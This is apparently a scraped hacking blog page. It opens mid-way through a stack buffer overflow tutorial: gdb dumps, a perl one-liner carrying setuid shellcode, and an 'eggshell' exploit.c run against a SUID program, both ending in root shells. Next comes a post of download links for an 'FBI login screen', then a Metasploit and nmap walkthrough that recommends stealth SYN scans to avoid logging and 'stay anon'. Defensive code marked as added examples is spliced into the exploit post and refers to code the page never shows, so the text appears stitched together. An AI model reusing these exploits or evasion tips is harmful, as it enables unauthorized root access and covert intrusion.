\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`<br /><br /> <br /><br /> Starting program: /home/bodo/testbed2/test `perl -e 'print "\x90"x72, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69<br /><br /> \x89\xe3\x52\x53\x89\xe1\x8d\x42x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`<br /><br /> Breakpoint 1, main (argc=2, argv=0xbffffa54) at test.c:7<br /><br /> 7 if(argc <2)<br /><br /> (gdb) step<br /><br /> 11 strcpy(buff, argv[1]);<br /><br /> (gdb) x/200x $esp<br /><br /> 0xbffff940: 0x6f6e2800 0x0029656e 0xbffff994 0x00000000<br /><br /> 0xbffff950: 0xbffff994 0x00000000 0x00000000 0x00000000<br /><br /> 0xbffff960: 0x00000000 0x00000000 0x00000000 0x00000000<br /><br /> 0xbffff970: 0x00000000 0x00000000 0x0177ff8e 0xbffffa00<br /><br /> 
0xbffff980: 0x0066e4f8 0x00000000 0x00000000 0x00000000<br /><br /> ...<br /><br /> [Trimmed]<br /><br /> ...<br /><br /> 0xbffffa40: 0x08048484 0x006643d0 0xbffffa4c 0x0066af11<br /><br /> 0xbffffa50: 0x00000002 0xbffffb5a 0xbffffb73 0x00000000<br /><br /> 0xbffffa60: 0xbffffbf6 0xbffffc08 0xbffffc18 0xbffffc23<br /><br /> 0xbffffa70: 0xbffffc31 0xbffffc5b 0xbffffc6e 0xbffffc78<br /><br /> 0xbffffa80: 0xbffffe3b 0xbffffe47 0xbffffe52 0xbffffea4<br /><br /> 0xbffffa90: 0xbffffebe 0xbffffeca 0xbffffee2 0xbffffef7<br /><br /> 0xbffffaa0: 0xbfffff08 0xbfffff11 0xbfffff44 0xbfffff54<br /><br /> 0xbffffab0: 0xbfffff5c 0xbfffff69 0xbfffffac 0xbfffffce<br /><br /> 0xbffffac0: 0x00000000 0x00000010 0x0383f3ff 0x00000006<br /><br /> 0xbffffad0: 0x00001000 0x00000011 0x00000064 0x00000003<br /><br /> ...<br /><br /> [Trimmed]<br /><br /> ...<br /><br /> 0xbffffb30: 0x00000000 0x0000000f 0xbffffb4b 0x00000000<br /><br /> 0xbffffb40: 0x00000000 0x00000000 0x69000000 0x00363836<br /><br /> ---Type <return> to continue, or q <return> to quit---<br /><br /> 0xbffffb50: 0x00000000 0x00000000 0x682f0000 0x2f656d6f<br /><br /> 0xbffffb60: 0x6f646f62 0x7365742f 0x64656274 0x65742f32<br /><br /> 0xbffffb70: 0x90007473 0x90909090 0x90909090 0x90909090<br /><br /> 0xbffffb80: 0x90909090 0x90909090 0x90909090 0x90909090<br /><br /> 0xbffffb90: 0x90909090 0x90909090 0x90909090 0x90909090<br /><br /> 0xbffffba0: 0x90909090 0x90909090 0x90909090 0x90909090<br /><br /> 0xbffffbb0: 0x90909090 0x90909090 0x31909090 0xb0c389c0<br /><br /> 0xbffffbc0: 0x3180cd17 0x6e6852d2 0x6868732f 0x69622f2f<br /><br /> 0xbffffbd0: 0x5352e389 0x428de189 0xcd623078 0x61616180<br /><br /> 0xbffffbe0: 0x61616161 0x61616161 0x61616161 0x61616161<br /><br /> 0xbffffbf0: 0xfffba061 0x4f4800bf 0x414e5453 0x623d454d<br /><br /> 0xbffffc00: 0x77616b61 0x00696c61 0x4c454853 0x622f3d4c<br /><br /> 0xbffffc10: 0x622f6e69 0x00687361 0x4d524554 0x6574783d<br /><br /> 0xbffffc20: 0x48006d72 0x53545349 0x3d455a49 
0x30303031<br /><br /> 0xbffffc30: 0x48535300 0x494c435f 0x3d544e45 0x66663a3a<br /><br /> 0xbffffc40: 0x313a6666 0x312e3136 0x312e3234 0x312e3435<br /><br /> 0xbffffc50: 0x31203130 0x20383430 0x53003232 0x545f4853<br /><br /> (gdb) x/x $ebp<br /><br /> 0xbffff9c8: 0xbffffa28<br /><br /> (gdb) x/x $ebp+4<br /><br /> 0xbffff9cc: 0x00689e33<br /><br /> (gdb) x/x $ebp-4<br /><br /> 0xbffff9c4: 0x0066dc80<br /><br /> (gdb) x/x $esp<br /><br /> 0xbffff940: 0x6f6e2800<br /><br /> (gdb) q<br /><br /> The program is running. Exit anyway? (y or n) y<br /><br />The important parts of the memory dump were highlighted in colour in the original: the run of 0x90 NOP bytes (starting at 0xbffffb73) and the shellcode that follows them. Next, pick an address inside the NOP area. If the chosen address fails, try another adjacent one; the one hard requirement is that the return address points somewhere into the NOPs. Let's try the following address.<br /><br /> 0xbffffba0<br /><br />Written as escaped bytes:<br /><br /> \xbf\xff\xfb\xa0<br /><br />Reversed into little-endian byte order:<br /><br /> \xa0\xfb\xff\xbf<br /><br />Then, based on our previous arrangement,<br /><br /> NOPs (72 bytes) + Shellcode (32 bytes) + 'A' characters (20 bytes) + Return address (4 bytes, pointing back into the NOP area) = 72 + 32 + 20 + 4 = 128 bytes<br /><br />Replace the return-address part of the original argument with this value. 
Take note that this is a one-line command.<br /><br /> `perl -e 'print "\x90"x72, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68<br /><br /> \x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`<br /><br />Re-run the program with this new argument.<br /><br /> [bodo@lethalcode testbed2]$ whoami<br /><br /> bodo<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "\x90"x72, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80<br /><br /> \x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`<br /><br /> sh-3.00# whoami<br /><br /> root<br /><br /> sh-3.00# id<br /><br /> uid=0(root) gid=502(bodo) groups=502(bodo) context=user_u:system_r:unconfined_t<br /><br /> sh-3.00# su -<br /><br /> [root@lethalcode ~]# whoami<br /><br /> root<br /><br /> [root@lethalcode ~]# id<br /><br /> uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t<br /><br /> [root@lethalcode ~]#<br /><br />Well, we got root on the first try! And the rest is history :o)… We passed the input string to the program through argv[1] (the first command-line argument). Inside the program, strcpy() copied the input into the stack buffer without checking its size, neatly overwriting the saved return address with an address that points back into the stack. When main() finished, instead of returning to the system, it returned into the stack area, executed the NOPs and slid into our shellcode, which spawned a root shell. 
The final, overflowed stack layout should look something like the following:<br /><br />Figure 4: Spawning a root shell exploit - mission accomplished.<br /><br />EXAMPLE #2 – USING THE EGGSHELL<br /><br />What is an eggshell?<br /><br />The classic method shown in the previous example is rather clumsy, isn't it? In many cases the buffer is too small to hold the exploit code. Let's try another example using what is called an eggshell. Here we build the eggshell, a self-contained exploit string, on the heap, place it in an environment variable, and then run the vulnerable command-line program with that environment variable as its argument. With this approach the exploit string can be arbitrarily long, and it is the method of choice for local exploits, since it requires access to the environment variables of the process. 
An example of the eggshell program is shown below.<br /><br /> /* exploit.c */<br /><br /> #include <stdio.h><br /><br /> #include <string.h><br /><br /> #include <unistd.h><br /><br /> #include <stdlib.h><br /><br /> <br /><br /> /* default offset is 0 */<br /><br /> #define DEFOFFSET 0<br /><br /> /* default buffer size is 512, by knowing that our vulnerable */<br /><br /> /* program's buffer is 512 bytes */<br /><br /> #define DEFBUFFSIZE 512<br /><br /> /* No-operation instruction */<br /><br /> #define NOP 0x90<br /><br /> <br /><br /> /* our shellcode that spawns a root shell */<br /><br /> char hellcode[ ] = "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68"<br /><br /> "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";<br /><br /> <br /><br /> /* get the esp, so that we can determine the return address */<br /><br /> unsigned long getesp(void)<br /><br /> {__asm__("movl %esp, %eax");}<br /><br /> <br /><br /> int main(int argc, char *argv[])<br /><br /> {<br /><br /> /* declare and initialize some of the variables */<br /><br /> char *buff, *ptr;<br /><br /> long *addr_ptr, retaddr;<br /><br /> int i, offset=DEFOFFSET, buffsize=DEFBUFFSIZE;<br /><br /> <br /><br /> /* If the 1st argument is supplied, it is the buffer size, else use the default */<br /><br /> if(argc>1)<br /><br /> buffsize = atoi(argv[1]);<br /><br /> /* If the 2nd argument is supplied, it is the offset, else use the default */<br /><br /> if(argc>2)<br /><br /> offset = atoi(argv[2]);<br /><br /> <br /><br /> /* use a heap buffer for our string construction */<br /><br /> if(!(buff = malloc(buffsize)))<br /><br /> {printf("Memory allocation for buffer failed lor!\n");<br /><br /> exit (0);<br /><br /> }<br /><br /> <br /><br /> /* get the return address */<br /><br /> retaddr = getesp() - offset;<br /><br /> <br /><br /> /* just to display some data */<br /><br /> printf("Using the address: %0X\n", retaddr);<br /><br /> printf("The offset is: %0X\n", offset);<br /><br /> printf("The buffer size is: %0x\n", buffsize);<br /><br /> 
<br /><br /> ptr = buff;<br /><br /> addr_ptr = (long *)ptr;<br /><br /> <br /><br /> /* fill the whole buffer with the return address, one word at a time */<br /><br /> for (i=0; i< buffsize; i+=4)<br /><br /> *(addr_ptr++) = retaddr;<br /><br /> <br /><br /> /* overwrite the first half of the buffer with NOPs, one byte at a time */<br /><br /> for (i=0; i < buffsize/2; i++)<br /><br /> buff[i] = NOP;<br /><br /> <br /><br /> /* copy the shellcode after the NOPs, byte by byte */<br /><br /> ptr = buff + ((buffsize/2) - (strlen(hellcode)/2));<br /><br /> for (i=0; i < strlen(hellcode); i++)<br /><br /> *(ptr++) = hellcode[i];<br /><br /> <br /><br /> /* Terminate the string buffer with a NUL */<br /><br /> buff[buffsize-1] = '\0';<br /><br /> /* Now that we've got the string built */<br /><br /> <br /><br /> /* Copy the "EGG=" string into the buffer, so that we have "EGG=our_string" */<br /><br /> memcpy(buff, "EGG=", 4);<br /><br /> /* Put the buffer, "EGG=our_string", in the environment,<br /><br /> as an input for our vulnerable program */<br /><br /> putenv(buff);<br /><br /> /* spawn a shell that inherits EGG; the vulnerable program is run from it */<br /><br /> system("/bin/bash");<br /><br /> return 0;<br /><br /> }<br /><br />Compile and run the program. You can use the following program to verify the string in the environment variable, or use the set or env commands.<br /><br /> /* testenv.c */<br /><br /> #include <stdio.h><br /><br /> #include <stdlib.h><br /><br /> #include <unistd.h><br /><br /> <br /><br /> int main()<br /><br /> {<br /><br /> char *descr = getenv("EGG");<br /><br /> <br /><br /> if (descr)<br /><br /> printf("Value of EGG is: %s\n", descr);<br /><br /> else<br /><br /> printf("The environment variable not defined lor!\n");<br /><br /> return 0;<br /><br /> }<br /><br />Our vulnerable program is shown below. This is a SUID program. 
We declare xbuff[512], so we need 512 bytes and more to overflow the buffer on the stack.<br /><br /> /* vul.c */<br /><br /> #include <string.h><br /><br /> #include <unistd.h><br /><br /> <br /><br /> int main(int argc, char *argv[])<br /><br /> {<br /><br /> char xbuff[512];<br /><br /> <br /><br /> if(argc >1)<br /><br /> strcpy(xbuff, argv[1]);<br /><br /> return 0;<br /><br /> }<br /><br />Or, as before, you can verify this by running the program in gdb, as shown below:<br /><br /> [bodo@lethalcode testbed3]$ gdb -q vul<br /><br /> Using host libthread_db library "/lib/tls/libthread_db.so.1".<br /><br /> (gdb) disass main<br /><br /> Dump of assembler code for function main:<br /><br /> 0x08048368 <main+0>: push %ebp<br /><br /> 0x08048369 <main+1>: mov %esp, %ebp<br /><br /> 0x0804836b <main+3>: sub $0x208, %esp<br /><br /> 0x08048371 <main+9>: and $0xfffffff0, %esp<br /><br /> 0x08048374 <main+12>: mov $0x0, %eax<br /><br /> 0x08048379 <main+17>: add $0xf, %eax<br /><br /> 0x0804837c <main+20>: add $0xf, %eax<br /><br /> ...<br /><br /> [Trimmed]<br /><br /> ...<br /><br /> 0x08048396 <main+46>: pushl (%eax)<br /><br /> 0x08048398 <main+48>: lea 0xfffffdf8(%ebp), %eax<br /><br /> 0x0804839e <main+54>: push %eax<br /><br /> 0x0804839f <main+55>: call 0x80482b0 <_init+56><br /><br /> 0x080483a4 <main+60>: add $0x10, %esp<br /><br /> 0x080483a7 <main+63>: mov $0x0, %eax<br /><br /> 0x080483ac <main+68>: leave<br /><br /> 0x080483ad <main+69>: ret<br /><br /> End of assembler dump.<br /><br /> (gdb) q<br /><br /> [bodo@lethalcode testbed3]$<br /><br />So 520 (0x208) bytes are reserved for the stack buffer, and we need 528 or more to reach and overwrite the return address. 
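The strcpy() in vul.c above (and the sprintf() in the vulnerable.c server further down this page) copy caller-controlled data into a fixed stack buffer with no length check. As an added example that is not part of the original post, here are bounded replacements for both, keeping the two programs' buffer sizes; the function names and the argument-rejecting main() are my own.

```c
/* Added example, not code from the original post: bounded replacements for the
 * unchecked strcpy() in vul.c and the unchecked sprintf() in vulnerable.c.
 * Note that the exploits on this page also rely on an executable stack and a
 * predictable stack address; -fstack-protector, a non-executable stack and
 * ASLR are the usual compile-time/runtime hardening on top of a bounded copy. */
#include <stdio.h>
#include <string.h>

#define XBUFF_SIZE  512     /* same buffer size as vul.c */
#define BUFFER_SIZE 1024    /* same buffer size as vulnerable.c */

/* Bounded replacement for 'strcpy(xbuff, argv[1])' in vul.c.
 * Returns 0 on success, -1 if src (plus its NUL) does not fit in dst.
 * On failure dst is left as an empty string rather than partially filled. */
int bounded_copy(char *dst, size_t dstsize, const char *src)
{
    size_t n = 0;
    if (dstsize == 0)
        return -1;
    while (n < dstsize && src[n] != '\0')   /* never scan past dstsize bytes */
        n++;
    if (n == dstsize) {                     /* no room left for the NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);                /* n bytes plus the terminator */
    return 0;
}

/* Bounded replacement for the sprintf() in vulnerable.c's handling().
 * snprintf() never writes more than bufsize bytes and always NUL-terminates;
 * its return value reveals whether the greeting was truncated.
 * Returns the number of bytes stored (excluding the NUL), or -1 if the name
 * was too long for the buffer (buf then holds a truncated greeting). */
int bounded_greeting(char *buf, size_t bufsize, const char *name)
{
    int needed = snprintf(buf, bufsize, "Hello %s, nice to meet you!\r\n", name);
    if (needed < 0 || (size_t)needed >= bufsize)
        return -1;
    return needed;
}

/* Mirrors vul.c's main(), but with the bounded copy: an argument of 527 bytes
 * (enough to reach the saved return address in the original) is now rejected. */
int main(int argc, char *argv[])
{
    char xbuff[XBUFF_SIZE];
    if (argc > 1) {
        if (bounded_copy(xbuff, sizeof xbuff, argv[1]) != 0) {
            fprintf(stderr, "argument too long (max %d bytes)\n", XBUFF_SIZE - 1);
            return 1;
        }
        printf("copied %zu bytes\n", strlen(xbuff));
    }
    return 0;
}
```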
Follow these steps (using the default offset):<br /><br /> 1. Compile the exploit.c program and run it with the buffer size as an argument.<br /><br /> 2. Optionally, verify the EGG environment string.<br /><br /> 3. Then, compile the vul.c program and make it SUID.<br /><br /> 4. Run the vul program with $EGG as an argument.<br /><br /> 5. If it fails, repeat from step 1, adding another 100 bytes to the argument (the buffer size).<br /><br /> [bodo@lethalcode testbed3]$ ls -F -l<br /><br /> total 60<br /><br /> -rwxrwxr-x 1 bodo bodo 7735 Feb 17 22:32 exploit*<br /><br /> -rw-rw-r-- 1 bodo bodo 1107 Feb 17 22:32 exploit.c<br /><br /> -rwxrwxr-x 1 bodo bodo 6147 Feb 27 18:19 testenv*<br /><br /> -rw-rw-r-- 1 bodo bodo 206 Feb 27 18:18 testenv.c<br /><br /> -rwsr-xr-x 1 root root 5989 Feb 17 22:24 vul*<br /><br /> -rw-rw-r-- 1 bodo bodo 121 Feb 17 21:16 vul.c<br /><br /> [bodo@lethalcode testbed3]$ whoami<br /><br /> bodo<br /><br /> [bodo@lethalcode testbed3]$ id<br /><br /> uid=502(bodo) gid=502(bodo) groups=502(bodo) context=user_u:system_r:unconfined_t<br /><br />Let's try 612 (512 + 100) as the string buffer size.<br /><br /> [bodo@lethalcode testbed3]$ ./exploit 612<br /><br /> Using the address: BFFFFA28<br /><br /> The offset is: 0<br /><br /> The buffer size is: 264<br /><br /> [bodo@lethalcode testbed3]$ ./testenv<br /><br /> Value of EGG is: 1ÀðÍ1ÒRhn/shh//biãRSá Íÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿<br /><br /> (úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿<br /><br /> (úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ<br /><br /> [bodo@lethalcode testbed3]$ ./vul $EGG<br /><br /> Segmentation fault<br /><br /> [bodo@lethalcode testbed3]$<br /><br />The first try failed. So, add another 100 bytes to the buffer size. 
Repeat the previous steps.<br /><br /> [bodo@lethalcode testbed3]$ ./exploit 712<br /><br /> Using the address: BFFFF7D8<br /><br /> The offset is: 0<br /><br /> The buffer size is: 2c8<br /><br /> [bodo@lethalcode testbed3]$ ./vul $EGG<br /><br /> sh-3.00# whoami<br /><br /> root<br /><br /> sh-3.00# id<br /><br /> uid=0(root) gid=502(bodo) groups=502(bodo) context=user_u:system_r:unconfined_t<br /><br /> sh-3.00# su -<br /><br /> [root@lethalcode ~]# id<br /><br /> uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t<br /><br />Well, we got root on our second try, and this time our exploit code could be longer. Yihaaaaaaaaaaaaaaaaaaaaaa!!!!<br /><br /> </b></span></div>
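The remark in example 1 that NOP sleds are easy for an IDS to spot deserves a concrete check. The following is an added example, not code from the original post: it finds the longest run of single-byte filler instructions in a buffer (0x90 plus the one-byte inc/dec substitutes that the post's "NOP equivalent instructions" link refers to) and compares it to a threshold; the 128-byte sample input is constructed to mirror the 72-NOP layout used in example 1, and all function names are assumptions.

```c
/* Added example, not code from the original post: an IDS-style NOP sled
 * detector. Plain 0x90 sleds are trivial to spot; because attackers swap in
 * other one-byte instructions, the detector accepts a configurable set of
 * "filler" bytes rather than 0x90 alone. Thresholds are a policy choice:
 * ordinary text can contain short runs of these byte values (e.g. 'A'..'O'
 * are 0x41..0x4f), so a realistic threshold is well above a few bytes. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Bytes treated as sled filler: 0x90 (nop) and 0x40-0x4f, the one-byte
 * inc/dec register instructions that are the commonest NOP substitutes. */
static int is_sled_byte(uint8_t b)
{
    return b == 0x90 || (b >= 0x40 && b <= 0x4f);
}

/* Length of the longest run of sled bytes in buf, 0 if there is none.
 * If start is non-NULL it receives the offset at which that run begins. */
size_t longest_sled_run(const uint8_t *buf, size_t len, size_t *start)
{
    size_t best = 0, best_start = 0, run = 0;
    for (size_t i = 0; i < len; i++) {
        if (is_sled_byte(buf[i])) {
            run++;
            if (run > best) {
                best = run;
                best_start = i + 1 - run;   /* first byte of this run */
            }
        } else {
            run = 0;
        }
    }
    if (start)
        *start = best_start;
    return best;
}

/* Policy wrapper: 1 if the longest sled run reaches the threshold, else 0. */
int looks_like_nop_sled(const uint8_t *buf, size_t len, size_t threshold)
{
    return longest_sled_run(buf, len, NULL) >= threshold;
}

/* Build a constructed 128-byte sample shaped like the argument in example 1:
 * 72 sled bytes, 32 bytes standing in for the shellcode, 20 'a' bytes and
 * 4 bytes standing in for the return address (all values constructed here).
 * Returns the number of bytes written, or 0 if cap is too small. */
size_t build_sample(uint8_t *out, size_t cap)
{
    static const uint8_t fake_ret[4] = { 0xef, 0xbe, 0xad, 0xde };
    size_t n = 0;
    if (cap < 128)
        return 0;
    memset(out + n, 0x90, 72); n += 72;     /* the NOP sled */
    memset(out + n, 0xcc, 32); n += 32;     /* int3 bytes stand in for shellcode */
    memset(out + n, 'a', 20);  n += 20;     /* padding, as in the post */
    memcpy(out + n, fake_ret, 4); n += 4;   /* constructed return address */
    return n;
}
```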
</div>
How to get your computer to have an FBI login screen (posted by Indian4994, 2011-09-29)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><img alt="[Image: img20110327121913.jpg]" border="0" src="http://i1036.photobucket.com/albums/a443/RandyCandy2/img20110327121913.jpg" /><br /><br />
1) Download LogonStudios (It's Vista version but if you have Windows 7 it works)</b>
<b><br /></b>
</span>
</div>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>http://www.megaupload.com/?d=I8DIQ2YN</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
<span style="font-weight: bold;"><span style="text-decoration: underline;">For xp users:</span></span></b>
</span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>http://www.stardock.com/products/logonstudio/downloads.asp</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
2) You can download the FBI file here<br /></b>
</span>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>http://www.wincustomize.com/explore/logonstudio_xp/9606/</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
Or<br /></b>
</span>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>http://skins19.wincustomize.com/24/79/2479496/26/9859/preview-26-9859.jpg</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
<span style="font-weight: bold;"><span style="text-decoration: underline;">Optional</span></span>
3) The switch user button was annoying me so I downloaded this to
remove it (I'm the only one on my computer so I doubt I'll miss it)<br /></b>
</span>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>http://www.megaupload.com/?d=8N0EGIW4</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
Start it up, then open it and it'll do the rest<br /><br />
<span style="text-decoration: underline;"><span style="font-weight: bold;">For the users that want their 'switch user' button back download this:</span></span></b>
<b><br /></b>
</span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>http://www.megaupload.com/?d=AA5V5SFQ</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
Just run the file and it will return your button.</b></span><span style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
</span></div>
Using metasploit and its exploits (posted by Indian4994, 2011-09-29)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Welcome again to another ultra noob edition production. :) I know
everyone likes colors but I am indeed just going to be very
straightforward since I'm in happy land right now.<br /><br />
NOTE: I am not responsible for anything you do with this information. It is for educational purposes only.</b>
<b><br /><br />
First off we are going to set up metasploit with postgresql. (which I
use... but you can also use sqlite3 or mysql) These Structured Query
Language (SQL) databases are going to be what hold the information of a
target after scans and such.</b>
<b><br /><br />
For those of you using windows, you can go here.</b>
<b><br /><br />
<a href="http://pginstaller.projects.postgresql.org/" target="_blank">Click Me!</a></b>
<b><br /><br />
For this instalment of ultra noob edition i will be using blackbuntu. You can download blackbuntu </b><b><a href="http://www.blackbuntu.com/download" target="_blank">here!</a><br /><br />
To download backtrack you can go </b><b><a href="http://www.backtrack-linux.org/" target="_blank">here!</a><br /><br />
So once you have postgresql and its daemon running you need to run the
following commands to create a user and password for your metasploit
database.</b>
<b><br /><br />
In blackbuntu and backtrack 5 you will use the commands</b>
<b><br /></b>
</span>
</div>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>service postgresql start</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
In backtrack 4r2 and below use;</b>
</span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>/etc/init.d/postgresql-8.3 start</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
Note: you might have postgresql-8.4 as I do... so replace the 3 with a 4.<br /></b>
</span>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>sudo su postgres -c psql<br />
ALTER USER postgres WITH PASSWORD 'your password';<br />
<br />
\q<br />
<br />
sudo passwd -d postgres<br />
sudo su postgres -c passwd</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
Note: if using backtrack ignore the sudo commands as you are already root.<br /><br />
What this does is set up a user postgres with whatever password you choose.</b>
<b><br /><br />
Now, once inside metasploit, create or connect to the postgresql database with the following command.</b>
<b><br /></b>
</span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>db_connect postgres:yourpassword@127.0.0.1/msf3</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
<a href="http://img39.imageshack.us/i/metasploit1.png/" target="_blank"><img alt="[Image: metasploit1.png]" border="0" src="http://img39.imageshack.us/img39/3849/metasploit1.png" /></a><br /><br />
This will create a postgresql database called msf3 if you haven't
already created one. If you have, it will just connect to it (as shown in mine).</b>
<b><br />
This is where the show really gets going.<br />
Now you have two options... you can scan your network using outside tools to find the ip addresses or use an nmap ping scan.<br /><br />
To use a ping scan with nmap you would use nmap from the db_nmap command
because it automatically adds hosts in the network to your new
postgresql database.</b>
<b><br /></b>
</span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>db_nmap -Pn -v 192.168.1.1-255</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
<a href="http://img838.imageshack.us/i/metasploit2.png/" target="_blank"><img alt="[Image: metasploit2.png]" border="0" src="http://img838.imageshack.us/img838/1351/metasploit2.png" /></a><br /><br />
Now the -Pn argument tells nmap to run a ping scan on port 80 to decide
what hosts are up and will add them to your database, while the -v
command tells nmap to run in verbose mode giving you more detailed
feedback while the scan is running.</b>
<b><br />
Now after you have a list of live hosts you can run nmap in a new mode.</b>
</span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>db_nmap -sS -sV -sU -n -O -v 192.168.1.4</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
<a href="http://img59.imageshack.us/i/metasploit3.png/" target="_blank"><img alt="[Image: metasploit3.png]" border="0" src="http://img59.imageshack.us/img59/4308/metasploit3.png" /></a><br /><br />
NOTE: VERY IMPORTANT. RUNNING THE -sS COMMAND VS THE -sT COMMAND.</b>
<b><br />
THE -sT COMMAND COMPLETES A FULL TCP CONNECTION WHICH GETS LOGGED BY THE
REMOTE HOST. TO PREVENT THIS RUNNING A STEALTH SYN SCAN WITH THE -sS
COMMAND IS THE BEST OPTION. I HAVE STATED THIS IN OTHER TUTS ABOUT NMAP
BUT TO STAY ANON YOU NEED TO DO THIS.<br /><br />
Now I run the ip 192.168.1.4 because that is what is currently on my network. </b><b><br />
The -sS command runs a stealth syn scan which does not create a full tcp
connection and allows you to continue unlogged. The -sV scan will tell
you what services are running on a certain port which will come into
play when selecting an exploit to use.<br />
The -sU command runs a udp port scan against the target, and since there
is no reply from udp packets they never get logged in the first place.
The -O scan runs an OS scan against the target using tcp fingerprinting
